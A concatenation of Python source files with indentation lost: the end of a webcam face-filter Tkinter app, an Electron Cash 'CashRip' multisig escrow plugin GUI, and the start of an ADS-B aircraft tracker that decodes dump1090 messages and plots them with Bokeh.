apply_sprite(image, "./sprites/mustache.png",w1,x1,y1, incl)
#glasses condition
if SPRITES[3]:
(x3,y3,_,h3) = get_face_boundbox(shape, 1)
apply_sprite(image, "./sprites/glasses.png",w,x,y3, incl, ontop = False)
#flies condition
if SPRITES[2]:
#to make the "animation" we read each time a different image of that folder
# the images are placed in the correct order to give the animation impresion
apply_sprite(image, dir_+flies[i],w,x,y, incl)
i+=1
i = 0 if i >= len(flies) else i #when done with all images of that folder, begin again
#doggy condition
(x0,y0,w0,h0) = get_face_boundbox(shape, 6) #bound box of mouth
if SPRITES[4]:
(x3,y3,w3,h3) = get_face_boundbox(shape, 5) #nose
apply_sprite(image, "./sprites/doggy_nose.png",w3,x3,y3, incl, ontop = False)
apply_sprite(image, "./sprites/doggy_ears.png",w,x,y, incl)
if is_mouth_open:
apply_sprite(image, "./sprites/doggy_tongue.png",w0,x0,y0, incl, ontop = False)
else:
if is_mouth_open:
apply_sprite(image, "./sprites/rainbow.png",w0,x0,y0, incl, ontop = False)
# OpenCV represents images as BGR but PIL expects RGB, so we need to swap the channel order
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# converts to PIL format
image = Image.fromarray(image)
# Converts to a TK format to visualize it in the GUI
image = ImageTk.PhotoImage(image)
# Update the image in the panel to show it
panelA.configure(image=image)
panelA.image = image
video_capture.release()
# Initialize GUI object
root = Tk()
root.title("Snap chat filters")
this_dir = os.path.dirname(os.path.realpath(__file__))
# Adds a custom logo
imgicon = PhotoImage(file=os.path.join(this_dir, 'imgs', 'icon.gif'))
root.tk.call('wm', 'iconphoto', root._w, imgicon)
## Create 5 buttons and assign each one its corresponding function to activate a sprite
btn1 = Button(root, text="Hat", command = lambda: put_sprite(0))
btn1.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn2 = Button(root, text="Mustache", command = lambda: put_sprite(1))
btn2.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn3 = Button(root, text="Flies", command = lambda: put_sprite(2))
btn3.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn4 = Button(root, text="Glasses", command = lambda: put_sprite(3) )
btn4.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn5 = Button(root, text="Doggy", command = lambda: put_sprite(4) )
btn5.pack(side="top", fill="both", expand="no", padx="5", pady="5")
# Create the panel where webcam image will be shown
panelA = Label(root)
panelA.pack( padx=10, pady=10)
# Variable to control which sprite you want to visualize
SPRITES = [0,0,0,0,0] #hat, mustache, flies, glasses, doggy -> 1 is visible, 0 is not visible
BTNS = [btn1, btn2, btn3, btn4, btn5]
# Creates a thread where the OpenCV loop (the magic) runs
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
# Function to close everything properly (threads and GUI)
def terminate():
global root, run_event, action
print "Closing thread opencv..."
run_event.clear()
time.sleep(1)
#action.join() # strangely, on Linux this thread does not terminate properly, so .join() never returns
root.destroy()
print("All closed! Bye")
# When the GUI is closed it activates the terminate function
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() # starts the GUI event loop
|
qt3.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys, threading, time
#from PyQt5.QtCore import pyqtSlot
#from PyQt5.QtWidgets import *
#from PyQt5.QtGui import QFont, QIcon
# electron cash modules
'''
script_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(script_dir, 'packages'))
import imp
imp.load_module('electroncash', *imp.find_module('lib'))
imp.load_module('electroncash_gui', *imp.find_module('gui'))
imp.load_module('electroncash_plugins', *imp.find_module('plugins'))
'''
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.i18n import _
from electroncash import Network
from electroncash.bitcoin import COIN
from electroncash.address import Address, AddressError
from electroncash.plugins import BasePlugin, hook
from electroncash_gui.qt.util import EnterButton, Buttons, CloseButton, MessageBoxMixin, Buttons, MyTreeWidget, TaskThread
from electroncash_gui.qt.util import OkButton, WindowModalDialog
from electroncash.util import user_dir
import electroncash.version, os
from cashrip import CashRip
#sys.stderr = open('/dev/null', 'w')
class cashripQT(QWidget):
def __init__(self, parent):
super().__init__()
#self.window = window
self.parent = parent
self.config = None
self.cashRip = self.parent.cashRip
self.title = 'CashRipQT'
self.initUI()
# qt.py and qt3.py are identical from this line until almost the end of the file, except for the `if __name__` block.
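# Rough workflow, as reflected by the buttons created in initUI() below:
# 1. Buyer creates a contract and shares the generated x_pubkey (invite).
# 2. Merchant accepts the invite with that x_pubkey and sends back the generated
#    multisig address together with their own x_pubkey.
# 3. Buyer checks that both parties derived the same multisig address, then funds it.
# 4. Either party requests release of the funds to a BCH address and sends the
#    resulting transaction hex to the partner.
# 5. The partner signs and broadcasts that transaction hex to release the funds.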
def initUI(self):
QToolTip.setFont(QFont('SansSerif', 10))
#self.setToolTip('This is a <b>QWidget</b> widget')
self.buttons = QHBoxLayout()
btn1 = QPushButton('1: Create Contract\n(buyer)', self)
btn1.setToolTip('Creates a new contract.')
btn1.resize(btn1.sizeHint())
btn1.clicked.connect(self.invite)
self.buttons.addWidget(btn1)
#btn.move(50, 50)
btn2 = QPushButton('2: Accept Invite\n(merchant)', self)
btn2.setToolTip('Input: partner\'s <b>x_pubkey</b>.')
btn2.resize(btn2.sizeHint())
btn2.clicked.connect(self.accInvite)
self.buttons.addWidget(btn2)
btn3 = QPushButton('3: Check Address\n(buyer)', self)
btn3.setToolTip('Input: your partner\'s generated multisig <b>address</b> and <b>x_pubkey</b>. Also select the <b>contract</b> you used to invite your partner.')
btn3.resize(btn3.sizeHint())
btn3.clicked.connect(self.checkAddress)
self.buttons.addWidget(btn3)
btn4 = QPushButton('4: Request Release', self)
btn4.setToolTip('Input: BCH <b>address</b> to which the funds will be released. Also select your <b>contract</b> that contains the funds to be released.')
btn4.resize(btn4.sizeHint())
btn4.clicked.connect(self.requestRelease)
self.buttons.addWidget(btn4)
btn5 = QPushButton('5: Release', self)
btn5.setToolTip('Input: <b>hex code</b> sent by your partner. Also select your <b>contract</b> that contains the funds to be released.')
btn5.resize(btn5.sizeHint())
btn5.clicked.connect(self.release)
self.buttons.addWidget(btn5)
btn6 = QPushButton('Delete Contract', self)
btn6.setToolTip('Delete selected <b>contract</b>. You cannot delete any contract that still contains funds as you will then be unable to release those funds in the future.')
btn6.resize(btn6.sizeHint())
btn6.clicked.connect(self.delContract)
self.buttons.addWidget(btn6)
self.table = cashRipList(self)
self.table.setSelectionBehavior(QAbstractItemView.SelectRows)
#self.table.itemClicked.connect(self.table_click)
#self.table.setColumnCount(4)
#self.table.setHorizontalHeaderLabels(("Address;Confirmed;Unconfirmed;x_pubkey").split(";"))
#self.table.setColumnWidth(3,230)
#self.table.horizontalHeaderItem().setTextAlignment(Qt.AlignHCenter)
self.table.update()
#listWidget.currentItemChanged.connect(self.item_click)
self.textArea1 = QLabel('Please select the contract you wish to use below.')
#self.textArea2 = QLabel('Contract information (x_pubkey or transaction hex) goes in the box below.')
self.textArea2 = QLabel('')
self.textArea2.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.TextSelectableByKeyboard)
self.textArea2.setStyleSheet("color: rgb(0, 0, 0);")
self.textArea2.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Fixed)
#self.textArea.setText('Please select the contract you wish to use above.\nContract information (x_pubkey or transaction hex) goes in the box below.')
#self.textBox = QPlainTextEdit(self)
#self.textBox.setPlainText('')
'''
self.addressBoxArea = QHBoxLayout()
self.addressBox = QLineEdit(self)
self.addrLabel = QLabel("Address:")
self.addressBoxArea.addWidget(self.addrLabel)
self.addressBoxArea.addWidget(self.addressBox)
'''
# Add box layout, add table to box layout and add box layout to widget
self.layout = QVBoxLayout()
self.layout.addWidget(self.textArea1)
self.layout.addWidget(self.table)
#layout.addStretch(1)
self.layout.addWidget(self.textArea2)
#self.layout.addWidget(self.textBox)
#self.layout.addLayout(self.addressBoxArea)
self.layout.addLayout(self.buttons)
self.setLayout(self.layout)
#self.layout.move(100,100)
#self.listWidget.show()
self.setWindowTitle('Cash Rip')
#self.setGeometry(self.left, self.top, self.width, self.height)
self.resize(self.sizeHint())
self.center()
self.show()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def table_click(self, item):
pass
#print(item.text())
#print(self.currentRow())
#print(self.table.currentRow())
def getCurrentContract(self):
item = self.table.currentItem()
if item:
return int(item.text(0))
else:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Please select a contract above, or create a new one via Create or Accept.")
return None
#@pyqtSlot()
#def run_update(self):
# self.table.update()
def clearTextArea(self):
#self.textArea2.setStyleSheet("color: rgb(0, 0, 0);")
self.textArea2.setStyleSheet("")
self.textArea2.setText("")
def invite(self):
self.clearTextArea()
buttonReply = QMessageBox.question(self, 'Create Contract', "This will create a new contract", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if buttonReply == QMessageBox.Yes:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
wallet, contract = self.cashRip.genContractWallet()
contract["label"] = "buyer"
self.cashRip.updateContracts()
self.parent.update()
self.textArea2.setText("Give this x_pubkey to the other party:\n{}".format(contract['my_x_pubkey']))
else:
return
def accInvite(self):
self.clearTextArea()
text, ok = QInputDialog.getText(self, "Accept Invite","Your partner's x_pubkey:", QLineEdit.Normal, "")
if ok:
xpub = text
#xpub = self.textBox.document().toPlainText()
if xpub[:2] != "ff" or len(xpub) < 100:
#self.textBox.setStyleSheet("background-color: rgb(255, 0, 0);")
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The x_pubkey that you entered is invalid.")
return
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
wallet, contract = self.cashRip.genContractWallet()
contract["label"] = "merchant"
self.cashRip.updateContracts()
idx = len(self.cashRip.contracts)-1
try:
contract = self.cashRip.create_multisig_addr(idx, xpub)
except:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something was wrong with the x_pubkey you entered.")
self.cashRip.delContract(idx)
self.parent.update()
return
self.textArea2.setText("Your multisig address: {}\nYour x_pubkey: {}\nPlease share your x_pubkey and multisig address with your partner.".format(contract["address"], contract["my_x_pubkey"]))
self.parent.update()
#if self.textArea2.text()[:4] == "Your":
self.cashRip.startSyncMultiWallet(idx)
def checkAddress(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
if "address" in self.cashRip.contracts[currentContract]:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract already has an address. Maybe you selected the wrong contract?")
return
#text, ok = QInputDialog.getText(self, "Check Address","Your partner's x_pubkey:", QLineEdit.Normal, "")
dialog = CheckAddressDialog(self)
dialog.currentContract = currentContract
dialog.show()
#dialog.exec_()
self.dialog = dialog
#if dialog.exec_():
def checkAddressAcc(self, dialog):
#if a == QDialog.acccepted:
#addrOrig = self.addressBox.text()
addrOrig = dialog.address.text()
try:
addr = Address.from_string(addrOrig)
except AddressError as e:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The multisig address you entered is invalid.")
return
if addr.kind != Address.ADDR_P2SH:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The address you entered was not a multisig address.")
return
xpub = dialog.xpub.text()
if xpub[:2] != "ff" or len(xpub) < 100:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The x_pubkey that you entered is invalid.")
return
#currentContract = self.getCurrentContract()
currentContract = dialog.currentContract
if self.cashRip.contracts[currentContract]["my_x_pubkey"] == xpub:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("You entered your own x_pubkey, not your partner's.")
return
try:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
contract = self.cashRip.create_multisig_addr(currentContract, xpub, False)
except:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something was wrong with the x_pubkey you pasted.")
return
if contract["address"] == addrOrig:
self.textArea2.setText("Success. You and your partner generated the same address. You can now send funds to {}".format(addrOrig))
self.cashRip.startSyncMultiWallet(currentContract)
else:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something went wrong. You and your partner generated different addresses. Please double-check the x_pubkeys that you have sent to each other.")
os.remove(contract['addrWalletFile'])
del contract["addrWalletFile"]
del contract["address"]
del contract["partner_addr"]
del contract["partner_x_pubkey"]
del contract["partner_pubkey"]
del contract["gen_by_me"]
del contract["redeemScript"]
self.cashRip.updateContracts()
self.cashRip.multiWallets[currentContract] = None
self.parent.update()
def requestRelease(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
if "address" not in self.cashRip.contracts[currentContract]:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract does not have a multisig address yet.")
return
item = self.table.currentItem()
balance = float(item.text(3))+float(item.text(4))
if balance == 0:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract has no funds yet.")
return
text, ok = QInputDialog.getText(self, "Request Release","Address to release funds to:", QLineEdit.Normal, "")
if ok:
addr = text
try:
addrCheck = Address.from_string(addr)
except AddressError as e:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The release address you entered was invalid.")
return
try:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
tx = self.cashRip.maketx_from_multisig(currentContract, addr)
except ValueError as e:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText(str(e))
return
# EC 3.3.1 needs the output address to be an Address object rather than a string; giving it a string causes an AssertionError. A TypeError is caused if you give an Address object to EC 3.3.2 - that branch won't run for now.
except (AssertionError,TypeError) as e:
#print(type(e))
tx = self.cashRip.maketx_from_multisig(currentContract, addrCheck)
self.textArea2.setText("Send this transaction hex to your partner. He needs it to release your funds:\n{}".format(tx['hex']))
def release(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
if "address" not in self.cashRip.contracts[currentContract]:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract does not have a multisig address yet.")
return
item = self.table.currentItem()
balance = float(item.text(3))+float(item.text(4))
if balance == 0:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract has no funds yet.")
return
text, ok = QInputDialog.getText(self, "Release","Transaction hex:", QLineEdit.Normal, "")
if ok:
txhex = text
if len(txhex) < 150:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The transaction hex you entered was too short.")
return
try:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
sent = self.cashRip.sign_broadcast_tx_from_partner(txhex, currentContract)
if sent:
self.textArea2.setText("Transaction was broadcast to the network.")
else:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Transaction was not broadcast. Either you selected the wrong contract or the transaction hex did not contain a valid signature.")
except:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something went wrong. Maybe the hex value was invalid.")
def delContract(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
curItem = self.table.currentItem()
balC = curItem.text(3)
balU = curItem.text(4)
if curItem.text(2)[:4] != 'Wait' and (balC != "0.0" or balU != "0.0"):
#buttonReply = QMessageBox.question(self, 'Confirmation', "Are you sure you want to delete Contract #{}? It contains funds and you will be unable to release them in the future.".format(currentContract), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Cannot delete Contract #{} as it contains funds.".format(currentContract))
return
buttonReply = QMessageBox.question(self, 'Confirmation', "Are you sure you want to delete Contract #{}?".format(currentContract), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if buttonReply == QMessageBox.Yes:
self.cashRip.delContract(currentContract)
#self.table.update()
self.parent.update()
else:
return
class CheckAddressDialog(QDialog):
def __init__(self, parent):
super(CheckAddressDialog, self).__init__()
self.parent = parent
self.createFormGroupBox()
buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
buttonBox.accepted.connect(self.accept)
buttonBox.rejected.connect(self.reject)
mainLayout = QVBoxLayout()
mainLayout.addWidget(self.formGroupBox)
mainLayout.addWidget(buttonBox)
self.setLayout(mainLayout)
self.setWindowTitle("Check Address")
self.resize(self.sizeHint())
def accept(self):
self.parent.checkAddressAcc(self)
self.close()
def createFormGroupBox(self):
self.formGroupBox = QGroupBox("Check that your partner generated the multisig address correctly.")
layout = QFormLayout()
self.address = QLineEdit()
self.xpub = QLineEdit()
layout.addRow(QLabel("Address:"), self.address)
layout.addRow(QLabel("Partner's x_pubkey:"), self.xpub)
self.formGroupBox.setLayout(layout)
class cashRipList(MyTreeWidget):
#filter_columns = [0, 2]
def __init__(self, parent):
self.columns = [ _("Index"), _("Label"),_("Address"), _("Confirmed"), _("Unconfirmed"), _("Your x_pubkey") ]
MyTreeWidget.__init__(self, parent, self.create_menu, self.columns, 5, [1])
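# The trailing arguments (5 and [1]) are presumably MyTreeWidget's stretch column and
# editable-column list; column 1 (the label) being editable matches how on_edited()
# below handles edits.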
self.cashRip = self.parent.parent.cashRip
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.setSortingEnabled(True)
#self.setColumnWidth(1,5000)
def create_menu(self, position):
menu = QMenu()
selected = self.selectedItems()
names = [item.text(0) for item in selected]
keys = [item.text(1) for item in selected]
column = self.currentColumn()
column_title = self.headerItem().text(column)
column_data = '\n'.join([item.text(column) for item in selected])
menu.addAction(_("Copy {}").format(column_title), lambda: QApplication.clipboard().setText(column_data))
if column in self.editable_columns:
item = self.currentItem()
menu.addAction(_("Edit {}").format(column_title), lambda: self.editItem(item, column))
#run_hook('create_contact_menu', menu, selected)
menu.exec_(self.viewport().mapToGlobal(position))
def on_edited(self, item, column, prior):
label = item.text(1)
if len(label) > 40:
label = label[:40]
for c in self.cashRip.contracts:
if c["my_x_pubkey"] == item.text(5):
c["label"] = label
self.cashRip.updateContracts()
self.update()
return
def on_update(self):
#print("Updating tables")
#standard, multi = self.cashRip.getContractWalletBalances()
multi = self.cashRip.getMultiBalances()
item = self.currentItem()
current_id = int(item.text(0)) if item else None
self.clear()
items = []
for i,c in enumerate(self.cashRip.contracts):
if "address" in c:
addr = c['address']
values = [str(i), c["label"], addr, str(multi[addr][0]/COIN), str(multi[addr][1]/COIN), c["my_x_pubkey"]]
item = QTreeWidgetItem(values)
self.addTopLevelItem(item)
else:
item = QTreeWidgetItem([str(i), c["label"], "Wait for partner to send address.", "", "", c["my_x_pubkey"]])
self.addTopLevelItem(item)
if i == current_id:
self.setCurrentItem(item)
class SignalDummy(QObject):
update_signal = pyqtSignal()
class Plugin(BasePlugin):
def fullname(self):
return 'cash_rip'
def description(self):
return _("Configure CashRip Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.tabs = []
self.cashRip = None
self.config = config
self.signal_dummy = SignalDummy()
self.signal_dummy.update_signal.connect(self.update)
#self.tableUpdater = threading.Thread(target=self.updateTableLoop)
#self.tableUpdater.daemon = True
self.keepUpdating = True
self.tableUpdater = TaskThread(self.signal_dummy)
self.tableUpdater.add(self.updateTableLoop)
self.tableUpdater.start()
#self.wallet_windows = {}
@hook
def init_qt(self, gui):
# We get this multiple times. Only handle it once, if unhandled.
if self.windows:
return
for window in gui.windows:
self.load_wallet(window.wallet, window)
def updateTableLoop(self):
while self.keepUpdating:
time.sleep(6)
self.signal_dummy.update_signal.emit()
@hook
def load_wallet(self, wallet, window):
"""
Hook called when a wallet is loaded and a window opened for it.
"""
if self.cashRip is None:
topDir = os.path.join(self.config.path, 'cash_rip_data')
self.cashRip = CashRip(topDir, window.network)
self.windows.append(window)
tab = cashripQT(window, self)
self.tabs.append(tab)
#self.tab.set_coinshuffle_addrs()
icon = QIcon(":icons/tab_coins.png")
description = _("Cash Rip")
name = "Cash Rip"
tab.tab_icon = icon
tab.tab_description = description
#self.tab.tab_pos = len(self.window.tabs)
tab.tab_name = name
window.tabs.addTab(tab, icon, description.replace("&", ""))
@hook
def on_close_window(self, window):
idx = self.windows.index(window)
#tab = self.tabs[idx]
del self.windows[idx]
#tab.tableUpdater.stop()
#tab.keepUpdating = False
del self.tabs[idx]
def on_close(self):
"""
BasePlugin callback called when the plugin is disabled among other things.
"""
for idx,w in enumerate(self.windows):
tab = self.tabs[idx]
tabIndex = w.tabs.indexOf(tab)
w.tabs.removeTab(tabIndex)
self.tableUpdater.stop()
self.keepUpdating = False
self.windows.clear()
self.tabs.clear()
#@pyqtSlot()
def update(self):
for tab in self.tabs:
tab.table.update()
def requires_settings(self):
return False
if __name__ == '__main__':
app = QApplication(sys.argv)
p = Plugin(None, None, None)
network = Network(None)
network.start()
topDir = os.path.join(os.getcwd(), 'cash_rip_data')
p.cashRip = CashRip(topDir, network)
ex = cashripQT(p)
p.tabs.append(ex)
sys.exit(app.exec_())
|
main.py
|
import numpy as np
from threading import Thread, Event, Lock
import socket as sock
from subprocess import Popen
import sys
import time
import cartopy.crs as ccrs
from cartopy.geodesic import Geodesic
import platform
from geocoder import ip
import pyModeS as pms
from bokeh.plotting import curdoc, figure
from bokeh.models import ColumnDataSource, WheelZoomTool, WMTSTileSource, HoverTool
from bokeh.models.glyphs import ImageURL, Circle, MultiLine
from gc import collect
from os import _exit
# Unit conversions
ft = 0.3048 # Meters, exactly
kt = 1852 / 3600 # Meters / second, exactly
ft_min = ft / 60 # Meters / second, exactly
# Aircraft types
cats = {41:'Light', 42:'Small', 43:'Large', 44:'High-Vortex Large', 45:'Heavy', 46:'High Performance', 47:'Rotorcraft',
31:'Glider', 32:'Lighter-than-Air', 33:'Skydiver', 34:'Ultralight', 35:'Reserved', 36:'UAV', 37:'Space Vehicle',
21:'Surface Emergency Vehicle', 22:'Surface Service Vehicle', 23:'Point Obstacle', 24:'Cluster Obstacle', 25:'Line Obstacle', 26:'Reserved', 27:'Reserved'}
# Available sprites
sprites = {41:'Light', 42:'Small', 43:'Large', 44:'High-VortexLarge', 45:'Heavy', 47:'Rotorcraft',
31:'Glider', 34:'Ultralight'}
# ColumnDataSources for sending aircraft data to the plot. If you want to change these, remember to also change the new data dictionaries in atc() to match
# rot is specifically for rotating the aircraft sprite. hdg is the useful heading
# hb is an attempt to fix a mysterious bug involving phantom hitbox circles being left behind
planeSprites = ColumnDataSource(dict(img = [], x = [], y = [], rot = [], hb = [], addr = [], call = [], cat = [], alt = [], hdg = [], spd = []))
planeShdws = ColumnDataSource(dict(img = [], x = [], y = [], rot = []))
planeTrails = ColumnDataSource(dict(x = [], y = [])) # Active aircraft trails
planePaths = ColumnDataSource(dict(x = [], y = [])) # Historic flight paths
geo = Geodesic() # Define an ellipsoid to solve geodesic problems on
v = False # Verbose logging - toggles whether aircraft update messages are printed to the log
def log(strn):
now = time.strftime('%H:%M:%S')
print(now, strn)
f_log.write(now + ' ' + strn + '\n')
class Plane:
def __init__(self, addr):
self.addr = addr # ICAO address
self.seen = None # Timestamp of last message
self.call = 'UNKNOWN' # Callsign
self.cat = 'UNKNOWN' # Category
self.sprite = 'Large' # Sprite to display
self.pos = [] # Current position in Lat, Lon coordinates
self.alt = [] # Array of altitudes (feet)
self.gspd = None # Ground speed (knots)
self.aspd = None # Air speed (knots), this one seems largely unused.
self.hdg = None # Heading
self.clm = None # Climb rate (ft / min)
self.vel_t = None # Timestamp of the previous velocity message
# Aircraft velocity, used for estimating position between messages
self.vel = None
self.azi = None # Azimuth - this is the direction of travel along the ground, and is defined as anti-clockwise from East
# Require 2 position messages to initially decode the position, so save the previous one here
self.old_msg = None # Store the previous position message
self.old_odd = None # Message parity: 0 = Even, 1 = Odd
self.old_t = None # Timestamp of the previous position message
# Checks whether an aircraft's calculated velocity is exceedingly different from its broadcast velocity, and falls back to the broadcast velocity if needed
def vel_check(plane):
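# The ratio test x + 1/x > 3 flags a calculated/broadcast speed mismatch beyond roughly 2.6x in either
# direction, and the angle term flags a disagreement of more than 15 degrees between the calculated
# azimuth and the broadcast heading (converted to the same anti-clockwise-from-East convention).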
if plane.azi and plane.gspd and (plane.vel/(plane.gspd * kt) + (plane.gspd * kt)/plane.vel > 3 or (180 - abs(abs(90 - plane.hdg - plane.azi) - 180)) > 15):
plane.azi = 90 - plane.hdg
plane.vel = plane.gspd * kt
def parser(strm, traffic):
while not cease.is_set():
# dump1090 performs error checking and necessary corrections, so no need for any of that here
msg = strm.readline().rstrip()[1:-1] # Read a single line from the TCP stream
df = pms.df(msg) # Get the downlink format of this message
if not (df == 17 or df == 18):
continue # Discard this message if it's not one we want
with traffic_l: # Acquire traffic lock
addr = pms.icao(msg) # Get the ICAO address
plane = traffic.get(addr) # Get the corresponding plane if it exists
if not plane:
if v: log('Aircraft ' + addr + ' discovered')
plane = Plane(addr) # If it doesn't, create a new plane
traffic[addr] = plane
plane.seen = time.time()
tc = pms.typecode(msg) # Get the message typecode
# Callsign
if tc >= 1 and tc <= 4:
plane.call = pms.adsb.callsign(msg).replace('_', ' ').strip()
ec = int(msg[9], 16) & 0b0111 # Get the emitter category
if tc != 1 and ec: # Typecode 1 is reserved, and an ec of 0 means the data is unavailable.
plane.cat = cats[tc * 10 + ec]
sprite = sprites.get(tc * 10 + ec)
if sprite: plane.sprite = sprite # Set the aircraft sprite if one is available
elif not ec:
plane.cat = 'Unavailable'
else:
plane.cat = 'Reserved'
if v: log('Updated aircraft ' + addr + ' callsign: ' + plane.call + ' and category: ' + plane.cat + ' (TC = {:d}, EC = {:d})'.format(tc, ec))
# Position
elif tc >= 9 and tc <= 18:
if plane.pos: # A position reference can be used to decode a single message once a fix is achieved
plane.pos.append(pms.adsb.position_with_ref(msg, plane.pos[-1][0], plane.pos[-1][1]))
plane.alt.append(pms.adsb.altitude(msg))
# Solve the inverse geodesic problem to calculate the aircraft's velocity
# This tends to be more reliable than the broadcast velocity for predicting the aircraft's current position
disp = np.array(geo.inverse(plane.pos[-2], plane.pos[-1]))
plane.vel = disp[0, 0] / (plane.seen - plane.old_t)
plane.azi = disp[0, 2]
# A very large displacement in a short space of time usually indicates a corrupt position, try again with fresh position messages
if plane.gspd and plane.vel > plane.gspd * kt * 8: # 8 times broadcast speed seems to be a reasonable threshold
log('Warning: Aircraft ' + addr + ' moved faster than expected -\nCalculated {:.1f} m/s, received {:.1f} m/s\n\
...Verifying position...'.format(plane.vel, plane.gspd * kt))
plane.pos = [] # Erase position history
plane.old_msg = None # Reset old message to ensure a fresh pair
plane.old_odd = None
plane.old_t = None
continue
else: # If we don't have a position fix yet
odd = (int(msg[13], 16) >> 2) & 1 # Get the message parity. One day I'll remember there's two hex characters to a byte...
# If we have an old message saved and one message is odd and the other is even...
if plane.old_msg and plane.old_odd ^ odd:
if odd: # If the new message is the odd one
plane.pos.append(pms.adsb.position(plane.old_msg, msg, plane.old_t, plane.seen))
else:
plane.pos.append(pms.adsb.position(msg, plane.old_msg, plane.seen, plane.old_t))
# Occasionally, an aircraft position will somehow be calculated as None. Catch this before it breaks anything
if plane.pos[-1] is None:
log('Warning: Aircraft ' + addr + ' position was found to be None')
plane.pos.pop(-1) # Remove the faulty position
plane.old_msg = msg
plane.old_odd = odd
plane.old_t = plane.seen
continue
plane.alt.append(pms.adsb.altitude(msg))
# Find where the plane was when it sent the old message to get the velocity azimuth
pos_old = pms.adsb.position_with_ref(plane.old_msg, plane.pos[-1][0], plane.pos[-1][1])
disp = np.array(geo.inverse(pos_old, plane.pos[-1]))
plane.vel = disp[0, 0] / (plane.seen - plane.old_t)
plane.azi = disp[0, 2]
else: # The messages are useless on their own or if they have the same parity, so save this message and wait for another one.
plane.old_msg = msg
plane.old_odd = odd
# Verify the calculated velocity, unless it's been too long since the last velocity message
# This should prevent aircraft from drifting around corners
if plane.vel_t and plane.seen - plane.vel_t < 5: vel_check(plane)
plane.old_t = plane.seen # Timestamp of most recent position
if v:
if plane.pos:
log('Updated aircraft ' + addr + ' position: {:.5f} N, {:.5f} E, {:d} ft'.format(plane.pos[-1][0], plane.pos[-1][1], plane.alt[-1]))
else:
log('Updated aircraft ' + addr + ' position: No fix yet, initial message saved')
# Velocity
elif tc == 19:
try:
spd, plane.hdg, plane.clm, spd_t = pms.adsb.velocity(msg)
except TypeError: # Very rarely, the velocity calculation will return None. Catch this before it breaks anything
log('Warning: Failed to update aircraft ' + addr + ' velocity due to a TypeError')
continue
if spd_t == 'GS': # Check whether we got a ground speed or air speed
plane.gspd = spd
if v: log('Updated aircraft ' + addr +
' velocity: Ground speed = {:d} kt, Heading = {:.1f} deg, Climb rate = {:d} ft/min'.format(plane.gspd, plane.hdg, plane.clm))
else:
plane.aspd = spd
if v: log('Updated aircraft ' + addr +
' velocity: Air speed = {:d} kt, Heading = {:.1f} deg, Climb rate = {:d} ft/min'.format(plane.aspd, plane.hdg, plane.clm))
# Update velocity if needed
vel_check(plane)
plane.vel_t = plane.seen # Timestamp of most recent velocity
else:
pass # Unrecognised typecode
# Keeps track of air traffic and updates the map
def atc():
new_plane_data = dict(img = [], x = [], y = [], rot = [], hb = [], addr = [], call = [], cat = [], alt = [], hdg = [], spd = [])
new_shdw_data = dict(img = [], x = [], y = [], rot = [])
new_trail_data = dict(x = [], y = [])
new_path_data = dict(x = [], y = [])
active = 0 # Number of active aircraft to be displayed
ded = [] # Aircraft that need to be deleted
pos = [] # Aircraft lat, lon positions
azi = [] # Aircraft azimuths
dst = [] # Aircraft distances travelled since last message
